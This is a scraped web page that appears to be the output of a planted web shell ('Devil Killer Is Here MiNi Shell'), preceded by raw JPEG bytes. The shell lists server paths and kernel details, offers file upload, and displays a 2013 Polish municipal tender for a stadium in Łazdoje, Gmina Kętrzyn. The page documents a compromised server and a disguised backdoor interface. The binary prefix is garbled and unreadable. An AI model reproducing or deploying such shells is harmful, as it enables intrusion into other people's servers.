JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130328/123354-N-2013.html

<p class="kh_header"><b>Kętrzyn: BUDOWA STADIONU SPORTOWEGO WRAZ Z BUDYNKIEM SOCJALNYM W MIEJSCOWOŚCI ŁAZDOJE, GMINA KĘTRZYN.</b><br>
<b>Numer ogłoszenia: 123354 - 2013; data zamieszczenia: 28.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Kętrzyn , ul. Kościuszki 2, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 089 7512474 w. 17, faks 089 7512746.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminaketrzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA STADIONU SPORTOWEGO WRAZ Z BUDYNKIEM SOCJALNYM W MIEJSCOWOŚCI ŁAZDOJE, GMINA KĘTRZYN..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest budowa boiska sportowego z budynkiem szatniowo-sanitarnym wraz z niezbędną infrastrukturą w miejscowości Łazdoje, działki Nr 241/17, 241/22, Gmina Kętrzyn.

Inwestycja realizowana jest w ramach projektu Edukacja sportowa na obszarze przygranicznym - przygotowanie i budowa stadionów sportowych w Gminie Kętrzyn
i Oziersk ( Sport education on cross- border territory - preparation and building of sports stadiums in Ketrzyn Communit and Ozyorsk, LPR1/010/126) ,  w ramach Programu Litwa-Polska -  Rosja 2007-2013.


       CPV:       45000000-8   Roboty budowlane
                    45100000-8   Przygotowanie terenu pod budowę 
                    45111200-0   Roboty w zakresie przygotowania terenu pod budowę
                                       i roboty ziemne 
                    45112100-6   Roboty w zakresie kopania rowów 
                    45112210-0   Usuwanie wierzchniej warstwy gleby 
                    45200000-9   Roboty budowlane w zakresie wznoszenia kompletnych  
                                       obiektów budowlanych lub ich części oraz roboty w 
                                       zakresie inżynierii lądowej  i wodnej.
                    45230000-8   Roboty budowlane w zakresie budowy rurociągów, linii
                                       komunikacyjnych i elektroenergetycznych, autostrad, 
                                       dróg, lotnisk i kolei; wyrównywanie terenu
                    45231000-5   Roboty budowlane w zakresie budowy rurociągów, 
                                       ciągów  komunikacyjnych i linii 
                                       energetycznych                
                    45232440-8   Roboty budowlane w zakresie budowy rurociągów
                                       do odprowadzania  ścieków                  
                    45233200-1   Roboty w zakresie różnych nawierzchni
                    45260000- 7  Roboty w zakresie wykonywania pokryć i konstrukcji 
                                       dachowych i inne podobne roboty                      
                                       specjalistyczne    
                    45262311-4  Betonowanie konstrukcji
                    45262310-7 Zbrojenie                                                          
                    45262520-2  Roboty murarskie
                    45300000-0 Roboty instalacyjne w budynkach
                    45310000-3  Roboty instalacyjne elektryczne     
                    45320000-6 Roboty izolacyjne
                    45330000-9 Roboty instalacyjne wodno-kanalizacyjne i sanitarne
                    45400000-1 Roboty wykończeniowe w zakresie obiektów budowlanych
                    45212221-1 Roboty budowlane w zakresie budowy boisk  
                                    sportowych                  
                  71354000-4  Usługi sporządzania map   
 
2. Przedmiot zamówienia obejmuje (zakres rzeczowy)

2.1 Roboty rozbiórkowe : betonowe utwardzenie terenu - 257,75 m2
                                   kabiny dla zawodników             - 2 szt.

2.2 Budowa budynku szatniowo-sanitarnego o powierzchni użytkowej 156,73m2
        z instalacjami :
        - instalacja elektryczna z osprzętem, w tym : oświetlenie, gniazda wtykowe,
          pojemnościowe  podgrzewacze wody 4 szt. x 2000 W, grzejnki elektryczne -  
          12 szt. o łącznej mocy 14,1 kW, rozdzielnice;  
        - zasilanie budynku w energię elektryczną WLZ od złącza kablowego łącznie
          z zabezpieczeniami - kabel YKY 5 x 10 mm2 w rurze osłonowej DVK O 75, 
           długość 34 m +4 m;
        - instalacja wentylacji grawitacyjnej i mechanicznej z osprzętem;
        - instalacja wodno-kanalizacyjna z osprzętem.

Budynek parterowy bez podpiwniczenia. 
     Fundamenty   -   ławy   żelbetowe,   beton   C16/20, zbrojenie  pręty  o10  co  20  cm,  pręty  rozdzielcze  o14 stal  klasy  A-II  (18G2)  i  strzemiona  o6  stal  klasy  A-0 (StOS), co 20 cm oraz betonowe z betonu C16/20. 
     Ściany  fundamentowe  -  z  bloczków  betonowych  gr. 25  cm  na  zaprawie  cementowej  50,  zakończone wieńcami - beton C16/20, pręty klasy A-II (18G2) 4 Fi 14, strzemiona - stal klasy A-0 (StOS) Fi 6, co 20 cm. Izolacja  pionowa  -  styropian    FS80  gr.  10  cm,  siatka na klej, wyprawa cementowa wodoszczelna, 2 warstwy preparatu  Abizol,  2  warstwy  papy  na  lepiku,  folia kubełkowa.  Izolacja  pozioma  ścian  -  2x  papa  na lepiku. 
       Ściany  zewnętrzne z  bloczków  gazobetonowych gr.  24  cm  odmiany  10  na  zaprawie  cementowej M15,  ocieplone  styropianem  EpS70  gr.  16  cm. 
       Strop  -  drewniany,  belki  10x20  cm,  płyta  gipsowo  - kartonowa  GKF
ognioodporna  i wodoodporna   gr. 30 mm    wodoodporne    i    ognioodporna    na
ruszcie aluminiowym      mocowanym      do      belek,      folia aluminiowa, ocieplenie
z wełny mineralnej gr. 20 cm. 
         Dach: 
a)  Konstrukcja -  drewniana, drewno  iglaste impregnowane,  zabezpieczone  przed
     palnością, grzybami  i  owadami,  drewno  klasy  C-30.  Dachy dwuspadowy.
     Wymiary  elementów  określono  na rzucie więźby i przekrojach poprzecznych. 
b)  Pokrycie    -    blachodachówka.    Kolor    pokrycia  ciemnobrązowy. 
c)  Obróbki  blacharskie  -  z  blachy  lakierowanej  lub powlekanej   w   kolorze  
     pokrycia,   rynny   i   rury spustowe PCV w kolorze pokrycia. 
     Stolarka :
 - okienna z PCV wg wykazu;
 - drzwiowa aluminiowa i drewniana wg wykazu.

2.3 Zwiększenie wymiarów boiska o nawierzchni trawiastej o 565,6m2 .
 Darń z trawy typu sportowego do boisk piłkarskich siana na warstwie gleby roślinnej ułożonej na podłożu z podkładu o uziarnieniu  Qmax = 8 mm gr. 15 cm, 
żwiru Qmax = 20-30 mm gr. 15 cm na geowłókninie typu K 1/150, ułożonej na warstwie żwiru gr. 20 cm.

2.4  Wykonanie chodników z kostki POLBRUK gr. 8 cm - 1 006,71 m2.
        Dojścia i chodniki z kostki Polbruk gr. 8 cm na podsypce piaskowo - cementowej
       1:3 gr. 5 cm, kruszywo łamane niesortowane o granulacji 0/31,5 mm gr. 10 cm.

2.5 Wykonanie parkingów i dojazdów - 3 247,89  m2.
Parkingi i dojazdy na płycie ażurowej betonowej - ażurowe żelbetowe płyty
drogowe o wymiarach 100x75x12 cm wypełnione mieszanką piaskowo -
cementową na podsypce piaskowo - cementowej 1:3 gr. 8 cm, górna warstwa
podbudowy z kruszywa łamane o granulacji 40 mm gr. 8 cm, kruszywo łamane
sortowane o granulacji 25/63 mm gr. 12 cm, warstwa mrozoochronna z pospółki
gr. 10 cm.

2.6 Wykonanie stojaka na 10 rowerów.

2.7 Wykonanie ogrodzenia z paneli ogrodzeniowych o wysokości 2,0 m na cokole 
      betonowym - 457,32 mb, plus furtki i bramy.

2.8  Wykonanie piłkochwytów o wysokości 6m - 2 szt.oraz fundamentów pod słupki bramek do piłki nożnej na tulejach montażowych.

2.9 Wykonanie wiat dla zawodników - 2 szt.
     Wiaty typowe dla zawodników rezerwowych o gabarytach: h=2095 mm, 
     szerokość 1260 mm, odległość między siedziskami 50 cm, ilość osób 7-8.

2.10 Wykonanie trybun z wiatą stalową, na 252 miejsca siedzące.

2.11 Wykonanie przyłącza do sieci wodociagowej z rur PE 40 mm o długości 32m 
        ze studnią wodomierzową.

2.12 Wykonanie przyłącza do sieci kanalizacji sanitarnej z rur PVC 160 mm
   o długości 30 m.

2.13 Szczegółowy opis elementów przedmiotu zamówienia wymienionych w punktach
      od 2.1 do 2.12 stanowią załączniki: 
Załącznik Nr 1 do SIWZ  Projekt budowlany
Załącznik Nr 2 do SIWZ  Przedmiar robót
Załącznik Nr 3 do SIWZ  Specyfikacja techniczna wykonania i odbioru robót budowlanych

 Przedmiar robót należy traktować jako opracowanie pomocnicze, niestanowiące jedynej podstawy do ustalenia ceny ofertowej.  
W przypadku rozbieżności pomiędzy dokumentami opisującymi niniejsze zamówienie  należy stosować następującą kolejność ich interpretacji (ważności) :
  1) niniejsza SIWZ,
  2) projekt budowlany,
  3) przedmiar robót,
  4) specyfikacja techniczna wykonania i odbioru robót.

2.14 Do obowiązków wykonawcy zamówienia będzie należało również :
   1) obsługa geodezyjna robót łącznie z inwentaryzacją geodezyjną powykonawczą;
   2) powiadomienie właścicieli (użytkowników, administratorów) gruntów i stosownych organów o terminie wejścia na grunt z robotami budowlanymi;  
   3) zapewnienie dostaw niezbędnych do realizacji zamówienia mediów, w tym wody  
       i energii elektrycznej, na okres realizacji zamówienia;
   4)  przeprowadzenie prób i badań, niezbędnych do przekazania obiektu do użytkowania;   
   5) uporządkowanie terenu po zakończeniu robót,  łącznie z odtworzeniem ciągów
        komunikacyjnych i urządzeń uzbrojenia terenu,  zniszczonych w trakcie robót.


3. Podana w przedmiarach robót podstawa nakładów nie stanowi obowiązującej wykonawcę podstawy przy kalkulacji ceny. Cenę  ofertową należy ustalić w oparciu o własną, opartą na rachunku ekonomicznym kalkulację ceny lub na podstawie danych rynkowych. Cena ofertowa będzie ceną ryczałtową za wykonanie całego zamówienia.

4. Jeżeli dokumenty opisujące przedmiot zamówienia, wskazują dla niektórych materiałów   lub urządzeń znaki towarowe lub pochodzenie, zamawiający dopuszcza składanie ofert równoważnych, tj. z zastosowaniem  materiałów i urządzeń innych producentów , pod warunkiem zapewnienia tych samych parametrów technicznych . Wykazanie, iż zamienione materiały i urządzenia posiadają takie same parametry techniczne jak te w dokumentacji projektowej lub specyfikacjach technicznych wykonania i odbioru robót, będzie należało do obowiązków wykonawcy.

5. Wykonawca zrealizuje zamówienie z własnych materiałów. Zastosowane materiały
muszą spełniać wymogi prawa dotyczące dopuszczenia do stosowania w budownictwie. Spełnianie powyższych wymogów wykonawca będzie zobowiązany udokumentować przy odbiorze końcowym. Wszelkie rozwiązania  o charakterze estetycznym, jak np. kolorystyka, detale wykończeniowe, wymagają zatwierdzenia do realizacji przez inspektora nadzoru inwestorskiego.


6. Wymagany okres gwarancji - 3 lata od odbioru końcowego,
  
7.  Zamawiającemu przysługuje prawo wprowadzenia zmian w stosunku do dokumentacji projektowej i zlecenia wykonawcy wykonania robót zamiennych, tj. rezygnacji z jednych robót na rzecz innych o tej samej wartości.  Wykonawca zobowiązany jest zrealizować zamówienie zgodnie ze zleconymi zmianami. 

8. Zamawiającemu przysługuje prawo zmniejszenia zakresu zamówienia w przypadku wystąpienia okoliczności uniemożliwiających realizację pełnego zakresu zamówienia lub uzasadniających jego zmniejszenie.

9. Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art.67 ust.1 pkt 6 ustawy, o łącznej wartości nie większej niż 30% wartości zamówienia podstawowego, zgodnych z przedmiotem zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, w tym wykonania nawierzchni trawiastej boiska. Wykonawcy nie przysługuje roszczenie o udzielenie zamówienia uzupełniającego.

10. Harmonogram realizacji zamówienia :
1) do 15.07.2013r. - wykonanie robót na wartość 135 000,-zł;
2) do 30.11.2013r. - wykonanie robót na wartość 667 000,-zł (od rozpoczęcia prac);
3) 15.07.2014r.      - termin zakończenia realizacji zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>zgodnie z II.1.4  pkt 9</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-8, 45.10.00.00-8, 45.11.12.00-0, 45.11.21.00-6, 45.11.22.10-0, 45.20.00.00-9, 45.23.00.00-8, 45.23.10.00-5, 45.23.24.40-8, 45.23.32.00-1, 45.26.00.00-7, 45.26.23.11-4, 45.26.23.10-7, 45.26.25.20-2, 45.30.00.00-0, 45.31.00.00-3, 45.32.00.00-6, 45.33.00.00-9, 45.40.00.00-1, 45.21.22.21-1, 71.35.40.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania Wykonawca zobowiązany jest wnieść wadium w wysokości 40 000,- zł (słownie:  czterdzieści tysięcy złotych).
2. Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych
 w art. 45 ust. 6 ustawy, tj.:
1)pieniądzu;
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)gwarancjach bankowych;
4)gwarancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4. Wadium w pieniądzu należy wnieść przelewem  na rachunek bankowy Zamawiającego: Nr 36 1160 2202 0000 0002 0441 5046
5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6. W przypadku wniesienia wadium w formie innej niż pieniądz oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego Urząd Gminy Kętrzyn, ul. Kościuszki 2, w kancelarii pok. 16 lub dołączyć do oferty.
7. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnianiu warunków</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony, jeżeli:
 z oświadczenia o spełnieniu warunków art. 22 ust. 1 będzie wynikało że wykonawca spełnia przedmiotowy warunek i na podstawie złożonych  dokumentów wykonawca wykaże należyte wykonanie w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych polegających na wykonaniu nawierzchni boiska sportowego oraz co najmniej 1 roboty budowlanej w zakresie budowy obiektów kubaturowych o powierzchni użytkowej nie mniejszej niż 150 m2;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia o spełnianiu warunków</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony jeżeli: 
z oświadczenia o spełnieniu warunków art. 22 ust. 1, będzie wynikało że wykonawca
spełnia przedmiotowy warunek oraz na podstawie złożonych  dokumentów wykonawca
 wykaże dysponowanie, w celu wykonania zamówienia, przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi o specjalności:  
-konstrukcyjno-budowlanej, 
-instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,  wentylacyjnych,  wodociągowych i kanalizacyjnych, 
-instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenerge-tycznych,
-drogowej;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek będzie spełniony jeżeli: 
z oświadczenia o spełnieniu warunków art. 22 ust. 1 będzie wynikało że wykonawca spełnia przedmiotowy warunek oraz na podstawie złożonych  dokumentów wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 1 500 000,- zł (jeden milion pięćset tysięcy zł).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca, w myśl art. 26 ust. 2b ustawy, może polegać na  wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu :
- dokumenty dotyczące:
   a) zakresu dostępnych wykonawcy zasobów innego podmiotu,
   b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy
       wykonywaniu zamówienia,
   c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
   d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia;
